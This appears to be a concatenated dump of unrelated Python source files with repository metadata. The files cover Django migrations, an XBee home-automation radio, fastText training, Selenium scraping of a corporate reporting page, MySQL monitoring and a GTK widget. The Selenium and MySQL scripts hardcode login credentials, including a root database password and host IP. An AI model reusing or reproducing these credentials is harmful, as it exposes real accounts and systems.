'Meta': {'object_name': 'Region'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'cities.subregion': {
'Meta': {'object_name': 'Subregion'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Region']"}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'event.event': {
'Meta': {'object_name': 'Event'},
'audited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'authentication_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 5, 9, 0, 0)', 'auto_now_add': 'True', 'blank': 'True'}),
'cropping': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'email': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'featured_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 5, 9, 0, 0)', 'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.CharField', [], {'default': "'Free'", 'max_length': '40', 'blank': 'True'}),
'search_index': ('djorm_pgfulltext.fields.VectorField', [], {'default': "''", 'null': 'True', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'tickets': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['event.Venue']", 'null': 'True', 'blank': 'True'}),
'viewed_times': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'event.venue': {
'Meta': {'object_name': 'Venue'},
'city': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.City']"}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'default': "'Default Venue'", 'max_length': '250'}),
'street': ('django.db.models.fields.CharField', [], {'max_length': '250', 'blank': 'True'})
},
u'taggit.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
u'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_tagged_items'", 'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'taggit_taggeditem_items'", 'to': u"orm['taggit.Tag']"})
}
}
complete_apps = ['advertising']
|
[
"danialaftab@ucp.edu.pk"
] |
danialaftab@ucp.edu.pk
|
4e0b023472d01e665a666a9df645d52d62215dc1
|
b6216c94621d77483c751d4bb1839174bfdef0bb
|
/radio.py
|
bff61662d822b10bdf966ec31b0c8e54e8ac3401
|
[] |
no_license
|
jsdelivrbot/SmartHome
|
50bf995f08e2c718ddc7b6ae74c718c1e7d80235
|
12606823482e538cb24fea37f6b41079a50f4c0d
|
refs/heads/master
| 2020-04-10T15:02:13.948495
| 2018-12-10T00:19:52
| 2018-12-10T00:19:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,799
|
py
|
import serial, sys
import datetime
from xbee import XBee
from thing_speak import *
from pushover import *
def calc_ac_message(args, logger):
message = '111000' # prefix
message += ('01' if args['on_off-changed'] == 'true' else '10') # on_off
message += ('101001' if args['mode'] == 'cool' else '100110') # mode
fan_options = {'1': '1010',
'2': '1001',
'3': '0110',
'A': '0101'
}
message += fan_options[args['fan']] # fan
message += '1010101010'
temp_options = {'16': '10101001',
'17': '10100110',
'18': '10100101',
'19': '10011010',
'20': '10011001',
'21': '10010110',
'22': '10010101',
'23': '01101010',
'24': '01101001',
'25': '01100110',
'26': '01100101',
'27': '01011010',
'28': '01011001',
'29': '01010110',
'30': '01010101'
}
message += temp_options[args['temp']] #temp
message += '10101010101010101010101010101010100110'
message += message + message
message += '1111000000'
#logger.info("message={}".format(message))
data = ''
while len(message) > 0:
data += chr(int(message[:8],2))
message = message[8:]
#logger.info("data={}".format(data))
return data
class Radio:
def __init__(self):
self.serial_port = serial.Serial('/dev/ttyAMA0', 19200)
self.xbee = XBee(self.serial_port, callback=self.handle_received_data)
def handle_received_data(self, data):
if 'source_addr' in data and 'rf_data' in data:
device = self.status_updater.get_device_by_address(data['source_addr'], ord(data['rf_data'][0]))
rf_data = '\\'.join(x.encode('hex') for x in data['rf_data'])
print "[{}] - Receiving data from {}: {}, rssi:{} dBm".format(datetime.datetime.now(), device['name'], rf_data, -ord(data['rssi']))
if device is not None:
if device['type'] == 'shutter':
status = {'mode' : str(ord(data['rf_data'][1]))}
if device['type'] == 'shutterNew':
status = {'mode' : str(ord(data['rf_data'][1]))}
if device['type'] == 'temperature':
temperature = float(ord(data['rf_data'][1])*256+ord(data['rf_data'][2]))/10
rh = float(ord(data['rf_data'][3])*256+ord(data['rf_data'][4]))/10
status = {'Temp' : str(temperature), 'Rh' : str(rh)}
ThingSpeak_update_DHT22(temperature, rh)
if device['type'] == 'boiler':
now = datetime.datetime.now()
date = datetime.datetime.today().strftime('%Y-%m-%d')
curr_hour = "{}:{}".format(str(now.hour).zfill(2), str(now.minute).zfill(2))
mode = ord(data['rf_data'][1])
status = {'mode' : str(mode),
'time' : curr_hour,
'date' : date
}
if device['type'] == 'boiler_temperature':
temperature = float((ord(data['rf_data'][2]) << 8) | (ord(data['rf_data'][1]) << 0)) / float(256)
if temperature > 255:
return
device = self.status_updater.get_device_by_address(data['source_addr'], 1)
status = {'Temp': str(temperature)}
ThingSpeak_update_DS18B20(temperature)
if device['type'] == 'air_conditioner':
status = {'on_off' : ('false' if data['rf_data'][1] == '\x01' else 'true') }
if status is not None:
self.status_updater.update_device_status(device, status)
def close(self):
self.xbee.halt()
self.serial_port.close()
def update_shutter(self, addr, device_number, args):
shutter_options = {'100': '\x01',
'0': '\x02',
'pause': '\x03',
'25': '\x04',
'50': '\x05',
'75': '\x06',
}
data = shutter_options[args['mode']]
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_shutterNew(self, addr, device_number, args):
data = "\x02" if args['mode'] == 'pause' else ("\x01" + chr(int(args['mode'])))
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_boiler(self, addr, device_number, args):
if(args.has_key('mode')):
data = chr(int(args['mode']))
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+data))
def update_temperature(self, addr, device_number, args):
data = 0
def update_boiler_temperature(self, addr, device_number, args):
data = 0
def update_air_conditioner(self, addr, device_number, args):
data = calc_ac_message(args, self.logger)
self.xbee.send('tx',
frame_id='A',
dest_addr=addr,
options='\x00',
data=(chr(device_number)+chr(1)+data))
def set_status_updater(self, status_updater):
self.status_updater = status_updater
def set_logger(self, logger):
self.logger = logger
class DummyRadio:
def __init__(self):
print "Starting DummyRadio..."
def close(self):
self.logger.info("Bye Bye")
def update_shutter(self, addr, device_number, args):
self.logger.info("shutter={},{} args={}".format(addr, device_number, args))
def update_shutterNew(self, addr, device_number, args):
self.logger.info("shutterNew={},{} args={}".format(addr, device_number, args))
def update_air_conditioner(self, addr, device_number, args):
self.logger.info("air conditioner={},{}, args={}".format(addr, device_number, args))
calc_ac_message(args, self.logger)
def set_status_updater(self, status_updater):
self.status_updater = status_updater
def set_logger(self, logger):
self.logger = logger
|
[
"oded.tgr@gmail.com"
] |
oded.tgr@gmail.com
|
6e81587254659967305cf40abc42b70bb68fd223
|
3c74f6ace4a323d9778cc41a15b660a1796a3a5f
|
/src/feature_engineering/fastText_benchmark.py
|
7a1868d73308be1e31901bf39158f41aa13e47e5
|
[] |
no_license
|
drvshavva/Sentiment_analysis
|
476e276745594e58da8cd3c07bdadcf3d72ac2ad
|
38cdfa4c96bf7c239a1be81436248d13e704b31a
|
refs/heads/main
| 2023-05-03T19:54:15.155966
| 2021-05-21T17:35:46
| 2021-05-21T17:35:46
| 369,609,018
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 997
|
py
|
from gensim.models.fasttext import FastText
import multiprocessing
from sklearn import utils
from tqdm import tqdm
from os.path import dirname
tqdm.pandas(desc="progress-bar")
MODEL_PATH = dirname(dirname(dirname(__file__))) + "/models/word2vec/"
def train_fasText(corpus, n_epoch, name_corpus, sg, vector_size, negative, window, min_count, alpha, min_n, max_n):
cores = multiprocessing.cpu_count()
model = FastText(sg=sg, size=vector_size, negative=negative, window=window, min_count=min_count, workers=cores,
alpha=alpha, min_n=min_n, max_n=max_n)
model.build_vocab([x.words for x in tqdm(corpus)])
for epoch in range(n_epoch):
model.train(utils.shuffle([x.words for x in tqdm(corpus)]), total_examples=len(corpus), epochs=1)
model.alpha -= 0.002
model.min_alpha = model.alpha
model.save(
f"{MODEL_PATH}fastText_{name_corpus}_sg_{sg}_size_{vector_size}_window_{window}_min_count_{min_count}.model")
return model
|
[
"havvanur.dervisoglu@ithinka.com"
] |
havvanur.dervisoglu@ithinka.com
|
56f8c34e87096b7ccc618901f772eef0470f64d3
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_22467.py
|
5a358bc5c1aa3fc341e934a1ba21ccff3415ae08
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
# Python: Cancel object creation during initialization
data = [good, bad]
theList = [obj for obj in (MyObject(some_data) for some_data in data) if obj.data_is_valid]
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
4f64dd7851c54271eb27e872a0ffe121a7888fdd
|
447630c97d47bba555169bb336f692adcf6bb97c
|
/Website2/migrations/0002_auto_20201116_1857.py
|
6ccf25e8496904141f3f74acbad21dab1555db50
|
[] |
no_license
|
vinothini-jr/OwnBlogWebsite
|
e4a44654fe368c14d4d91e94214a9f3e5ac73148
|
6e37b0a687a313c437f46a51b1c6a8c9b94d504d
|
refs/heads/master
| 2023-02-19T11:22:24.620131
| 2021-01-20T13:55:07
| 2021-01-20T13:55:07
| 331,258,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
# Generated by Django 3.0.5 on 2020-11-16 13:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Website2', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='comment',
old_name='post',
new_name='posti',
),
]
|
[
"vinothinivno@gmail.com"
] |
vinothinivno@gmail.com
|
a4e61da72d38c7802c7f6964d9362e6ed62a8871
|
f0a5ad7b8aa39f51f233391fead0da3eabecc4ee
|
/.history/toolbox/baixaArquivo_20191127165502.py
|
d63cb56da0f775cc4431f9f1049aafaa065fdfab
|
[] |
no_license
|
OseiasBeu/webScrapping
|
e0a524847e55b24dbbd3d57bbe7fa43b4e101f48
|
1e72c7551aea355a891043baecfcbab8a89e719a
|
refs/heads/master
| 2022-10-25T18:12:50.858653
| 2020-06-18T01:29:24
| 2020-06-18T01:29:24
| 224,681,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,884
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
import os
import tempfile
import time
import shutil
import glob
def baixaArquivo():
driver = webdriver.Chrome(executable_path='chromedriver.exe')
driver.get("https://wsmid-qa.whirlpool.com.br/manager/reports/frmQueryAnalyzer.aspx?menu=2")
dominio = 'whirlpool'
usuario = 'daniel_coelho'
senha = '123456'
bra = "BRA"
data = '2019-11-01'
query = "SELECT pedido.clienteEstado, pedidoItem.warehouseId, count(pedidoItem.warehouseId) as [Pendentes de integração] FROM pedido LEFT JOIN pedidoItem ON pedido.codigoPedido = pedidoItem.codigoPedido WHERE pedido.datahoracriacao > '{}' AND pedido.clientepais = '{}' AND pedido.flagIntegrado = 0 GROUP BY pedidoItem.warehouseId, pedido.clienteEstado ORDER BY [Pendentes de integração] DESC".format(data,bra)
campo_dominio = driver.find_element_by_id("ucLogin1_txtDominio")
campo_dominio.send_keys(dominio)
campo_usuario =driver.find_element_by_id("ucLogin1_txtUser")
campo_usuario.send_keys(usuario)
campo_senha = driver.find_element_by_id("ucLogin1_txtPass")
campo_senha.send_keys(senha)
campo_senha.send_keys(Keys.RETURN)
records =driver.find_element_by_id("ctl00_ContentPlaceHolder1_dropRows")
records.send_keys("Sem limite") #ctl00_ContentPlaceHolder1_imbExecutar
text_query = driver.find_element_by_id("ctl00_ContentPlaceHolder1_txtQuery")
text_query.send_keys(query)
executar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExecutar").click()
time.sleep(5)
# chrome_options = Options()
# download_dir = tempfile.mkdtemp()
# try:
# chrome_options.add_experimental_option('prefs', {
# "plugins.plugins_list": [{"enabled":False,"name":"Chrome PDF Viewer"}],
# "download": {
# "prompt_for_download": False,
# "default_directory" : download_dir
# }
# })
# #...
#
# while glob.iglob(os.path.join(download_dir, '*.crdownload')):
# time.sleep(1) # espera o download terminar
# # pega o 1o pdf que tiver, só terá 1 pois a pasta estava vazia antes:
# arquivo = glob.iglob(os.path.join(download_dir, '*.xlsx'))[0]
# shutil.move(arquivo, r'C:\Users\beuo\Documents\Demandas\AtualizaMiddleIntegrationVtex\files\*.xlsx')
# # finally:
# # shutil.rmtree(download_dir) # remove todos os arquivos temporários
# exportar = driver.find_element_by_id("ctl00_ContentPlaceHolder1_imbExportExcel").click()
resultados = driver.find_elements_by_tag_name('span')
print(resultados[0])
# https://docs.google.com/spreadsheets/d/1QSGAY_WyamEQBZ4ITdAGCVAbavR9t-D-4gPQx4Sbf7g/edit?ts=5ddea57e#gid=63583812
time.sleep(10)
sair = driver.find_element_by_id("ctl00_lgStatus").click()
# print(query)
time.sleep(10)
driver.close()
|
[
"oseiasbeu@outlook.com"
] |
oseiasbeu@outlook.com
|
9cddda31ed48e2585ce38b7a8cf02df46126b51b
|
8dfe4b53fae92795405d789d52148d1291836afa
|
/.metadata/.plugins/org.eclipse.core.resources/.history/ba/f0bcb1d8c11d00171d43c367bf888dd0
|
c9bbb419225ed46c34895afd15e68cbdfec35a09
|
[] |
no_license
|
ymyjohnny/python
|
e07c54a88954e090cf3d30a4c6f6ac46353063fb
|
b483fd55e577d4dcceb5762bddf833df23874f3a
|
refs/heads/master
| 2021-01-10T01:10:19.038424
| 2019-07-02T02:40:23
| 2019-07-02T02:40:23
| 45,223,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
#!/usr/bin/python
#coding=utf-8
'''
Created on 2017-4-10
@author:ymy
Copyright ymyjohnny@gmail.com
'''
import MySQLdb,pymongo
import datetime
def getdelaytime(date,monitorfield):
conn=MySQLdb.connect(host="221.228.90.4",user="root",passwd="uqcqa8zd",db="dsp_backend")
cursor = conn.cursor ()
#打印多少条记录
print monitorfield
print date
data = cursor.execute("SELECT monitorfield,monitorcount,time,hostname FROM `dsp_solution_statistic` WHERE `monitorField` = '%s' AND TIME >= '%s' order by monitorcount desc limit 1" % (monitorfield,date) )
#打印具体内容
info = cursor.fetchmany(data)
print info
for row in info:
monitorcount = row[1]
hostname = row[3]
if monitorcount > 1:
print date, hostname, monitorfield , monitorcount , 'ms' ,'大于100ms'
cursor.close ()
conn.close ()
def main():
date = datetime.datetime.now().strftime("%Y-%m-%d 15:00:00")
monitorfield = 'time-frequency-percentile98'
test1 = getdelaytime(date,monitorfield)
if __name__ == '__main__':
main()
|
[
"ymyjohnny@adsame.com"
] |
ymyjohnny@adsame.com
|
|
a97a171d741d1a379fbc9709378197c2b2bfbb73
|
2f98aa7e5bfc2fc5ef25e4d5cfa1d7802e3a7fae
|
/python/python_28510.py
|
c23fe77642aa17ac04c7ad7976affbf5e85feb5d
|
[] |
no_license
|
AK-1121/code_extraction
|
cc812b6832b112e3ffcc2bb7eb4237fd85c88c01
|
5297a4a3aab3bb37efa24a89636935da04a1f8b6
|
refs/heads/master
| 2020-05-23T08:04:11.789141
| 2015-10-22T19:19:40
| 2015-10-22T19:19:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 40
|
py
|
# Integrate Python and Javascript
dicts
|
[
"ubuntu@ip-172-31-7-228.us-west-2.compute.internal"
] |
ubuntu@ip-172-31-7-228.us-west-2.compute.internal
|
4ef5a54bbc1283a0dc26f68de81532d923826fd3
|
4cc285b0c585241ff4404087e6fbb901195639be
|
/NeuralNetworkNumbers/venv/Lib/site-packages/sklearn/neighbors/tests/test_dist_metrics.py
|
6a9e15308b2a1578abff065b1d60e657dfebd836
|
[] |
no_license
|
strazhg/NeuralNetworksPython
|
815542f4ddbb86e918e657f783158f8c078de514
|
15038e44a5a6c342336c119cdd2abdeffd84b5b1
|
refs/heads/main
| 2023-04-16T18:51:29.602644
| 2021-04-27T14:46:55
| 2021-04-27T14:46:55
| 361,944,482
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:20da88360cc014a240b152fa1dcbdc08031fc751b644925e7a33ecd241a0527c
size 7590
|
[
"golubstrazh@gmail.com"
] |
golubstrazh@gmail.com
|
f3c093a80db997a217f9bb39070aa1c624905138
|
acb8e84e3b9c987fcab341f799f41d5a5ec4d587
|
/langs/7/q83.py
|
6dbc39926c8254d0523be224754339ce48893bc0
|
[] |
no_license
|
G4te-Keep3r/HowdyHackers
|
46bfad63eafe5ac515da363e1c75fa6f4b9bca32
|
fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2
|
refs/heads/master
| 2020-08-01T12:08:10.782018
| 2016-11-13T20:45:50
| 2016-11-13T20:45:50
| 73,624,224
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 486
|
py
|
import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'q83':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1])
|
[
"juliettaylorswift@gmail.com"
] |
juliettaylorswift@gmail.com
|
d8ed39fa433143eecb8f4953bd3e201a28ebc002
|
4402cb77b1a15e397fbc51f2c6f3240cbe8dfdac
|
/dbinit.py
|
1adcf7ea0df0995cb4c2bc046508782635a191c0
|
[] |
no_license
|
StrelnikovNikolay/scheduler
|
898494933967aaa5b2c60efb2dfcd664a4b2b112
|
2a56d77ce91cc2df7f04ec2defbafcdd2250219c
|
refs/heads/master
| 2016-09-06T11:50:30.827549
| 2012-06-10T06:21:44
| 2012-06-10T06:21:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 120
|
py
|
from scheduler import db
"""
create test database
"""
if __name__ == "__main__":
db.drop_all()
db.create_all()
|
[
"progolab@gmail.com"
] |
progolab@gmail.com
|
7490c35a50fa2472ac0eab374ec9e4a4348e203b
|
1feed26c45cc62e360773ad781aaaa13c6057e77
|
/modules/problem.py
|
ae39edc280554680d9529f3778885f99829ba876
|
[
"MIT"
] |
permissive
|
henriqueblang/tsp-ga
|
365cda7860862e959e0c4a2c0d5fae52c19d3e45
|
3a354bc9c0b24952c94afbaf6fcd81d94a9186af
|
refs/heads/master
| 2022-04-24T00:50:10.217634
| 2020-04-22T04:04:20
| 2020-04-22T04:04:20
| 257,787,026
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
import math
from modules.genetics.chromossome import Chromossome
# Vertex i (row) is adjacent to vertex j (column), where graph[i][j] is the edge weight
# If the graph is not complete, a non adjacent vertex is defined by None
GRAPH = (
(0, 2, 8, 5),
(2, 0, 3, 4),
(8, 3, 0, 7),
(5, 3, 7, 0)
)
# Arbitrarily long edge to complete graph (if there are any non adjacent vertexes)
NON_ADJACENT_WEIGHT = 20
def f(chromossome):
route = Chromossome.get_fenotype(chromossome.get_genes())
total_weight = 0
total_vertexes = len(GRAPH)
for i in range(total_vertexes):
vertex = route[i]
next_vertex = route[i + 1]
edge_weight = GRAPH[vertex][next_vertex]
if edge_weight is None:
edge_weight = NON_ADJACENT_WEIGHT
total_weight += edge_weight
return total_weight
# Fitness
def g(chromossome):
return 1 / (1 + f(chromossome))
def f_average(population):
avg = 0
for chromossome in population:
avg += f(chromossome)
avg /= len(population)
return avg
def g_average(population):
avg = 0
for chromossome in population:
avg += g(chromossome)
avg /= len(population)
return avg
|
[
"henrique.barcia@gec.inatel.br"
] |
henrique.barcia@gec.inatel.br
|
048085a4613537f236c977ce9eff9367f84860e5
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/28/usersdata/104/8782/submittedfiles/serie1.py
|
ad5d8a8cd81f84e3767fed50f00399919ee89084
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
#ENTRADA
n=input('Digite o valor de n:')
#SAÍDA+PROCESSAMENTO
soma=1
for i in range(2,n+1,1):
if i%2==0:
soma=soma-(1/i)
else:
soma=soma+(1/i)
print(i)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
61d3d86f3753c466dffd3af885d02a4beac04ea4
|
88413e9ca2eae9945f9bc495084f7e01f14b7396
|
/SRC/common/IO/GUI/whowidget.py
|
66865d230ca2773221dac43d51c461f76ee80fac
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
ljuillen/OOF3D
|
6867e298efdf5a82544e66bd6bf1868b0dce9051
|
b17bc6b5efefff10beca7b0f7d12ce93def33479
|
refs/heads/master
| 2020-12-21T13:50:05.805046
| 2019-08-22T15:59:22
| 2019-08-22T15:59:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,869
|
py
|
# -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
# Widget for choosing from a WhoClass. WhoWidget.get_value() returns
# the name of the selected object, which is what is necessary for
# scripting. The function using the result presumably knows how to
# use WhoClass.__getitem__ to get the actual object.
# The optional 'callback' argument to the constructor is called when a
# selection is made. The single argument to the callback function is
# the selected object (ie, the .obj member of the Who instance).
# The WhoWidget is different from the usual ParameterWidget (in
# parameterwidgets.py) because it contains a list of gtk objects
# instead of just one. Therefore it's not derived from
# ParameterWidget, and must do the work of that class by itself.
# Perhaps this is a symptom of bad design.
from ooflib.SWIG.common import switchboard
from ooflib.common import debug
from ooflib.common import labeltree
from ooflib.common.IO import whoville
from ooflib.common.IO.GUI import chooser
#from ooflib.common.IO.GUI import gtklogger
from ooflib.common.IO.GUI import parameterwidgets
from ooflib.common.IO.GUI import widgetscope
import gtk
import string
class WhoWidgetBase:
def __init__(self, whoclass, value, callback, scope, condition, sort,
widgettype, verbose=False):
debug.mainthreadTest()
self.whoclass = whoclass
self.scope = scope # WidgetScope object
self.verbose = verbose
# condition(obj) is a function that returns 1 if the object
# should be listed.
self.condition = condition
# sort is a function that takes a list of names and sorts them
# into the order in which they should appear in the GUI.
self.sort = sort
# widgettype must be either 'Chooser' or 'Combo'. It
# specifies the type of subwidget to use for the lowest widget
# in the Who hierarchy.
self.widgettype = widgettype
if scope:
scope.addWidget(self)
self.callback = callback
depth = len(whoclass.hierarchy())
# self.proxycheck = gtk.CheckButton()
self.proxy_names = []
self.widgets = [None]*depth
self.gtk = [None]*depth
self.currentPath = ['']*depth
self.destroysignals = [None]*depth
self.buildWidgets(value) # sets currentPath, widgets, and gtk
self.sbcallbacks = []
for whoklass in whoclass.hierarchy():
self.sbcallbacks += [
switchboard.requestCallbackMain(
('new who', whoklass.name()), self.newWhoCB),
switchboard.requestCallbackMain(
('remove who', whoklass.name()), self.newWhoCB),
switchboard.requestCallbackMain(
('rename who', whoklass.name()), self.renameWhoCB)
]
def buildWidgets(self, value=None, interactive=0):
debug.mainthreadTest()
# Construct a Chooser widget for each WhoClass in the target
# WhoClass's hierarchy. interactive is 1 if this call is in
# response to a user action.
## oldvalue = self.get_value()
oldpath = self.currentPath[:]
classlist = self.whoclass.hierarchy()
depth = len(classlist)
# Make sure value is a list.
value = labeltree.makePath(value)
# Make a list of the allowed proxies for the lowermost tier of
# the class hierarchy for this widget. Allowed proxies are
# those which satisfy both the passed-in condition *and* are
# proxies.
self.proxy_names = [x[0] for x in classlist[-1].keys(
condition = lambda x: (self.condition(x) and
not whoville.excludeProxies(x)),
sort=self.sort)]
# Make sure that value contains a setting for each chooser widget
if value and len(value) < depth:
value += [None]*(depth-len(value))
for d in range(depth):
try:
# Exclude proxies from this part of the process...
paths = classlist[d].keys(
base=self.currentPath[:d],
condition=lambda x:
self.condition(x) and whoville.excludeProxies(x) and not x.secret(),
sort=self.sort)
except KeyError, exc:
names = []
else:
names = [p[0] for p in paths]
if d==0:
# In the top-most level of the widget, include the
# proxy names for the lowermost level.
names += self.proxy_names
if self.widgets[d] is None:
if self.widgettype == 'Chooser' or d < depth-1:
self.widgets[d] = chooser.ChooserWidget(
names, callback=self.selectCB, callbackargs=(d,),
name=classlist[d].name())
else:
self.widgets[d] = chooser.ChooserComboWidget(
names, callback=self.comboCB,
name=classlist[d].name())
self.gtk[d] = self.widgets[d].gtk
self.destroysignals[d] = self.gtk[d].connect('destroy',
self.destroyCB, d)
else:
# Update the list of choices in an existing ChooserWidget.
self.widgets[d].update(names)
if value and value[d] in names:
# Set widget to the given value
self.widgets[d].set_state(value[d])
self.currentPath[d] = value[d]
elif self.currentPath[d] in names:
# ... or retain previous value
self.widgets[d].set_state(self.currentPath[d])
elif len(names) > 0:
# ... or pick the first value in the list
self.currentPath[d] = names[0]
self.widgets[d].set_state(0)
else:
# ... or don't pick anything
self.currentPath[d] = ''
if self.widgettype == 'Chooser':
self.gtk[d].set_sensitive(names != [])
# end for d in range(depth)
# The state of other widgets may depend on the state of this
# one. If so, they can use the WidgetScope mechanism to find
# this widget and listen for the following switchboard
# message. (Note that it's not sufficient to check to see if
# get_value()'s return value has changed. The return value
# can be None both before and after a state change.)
if oldpath != self.currentPath:
switchboard.notify(self, interactive=interactive)
def destroyCB(self, gtkwidget, d):
if self.widgets:
self.cleanUp()
def destroy(self):
debug.mainthreadTest()
for gtkwid in self.gtk:
gtkwid.destroy()
def cleanUp(self):
map(switchboard.removeCallback, self.sbcallbacks)
self.sbcallbacks = []
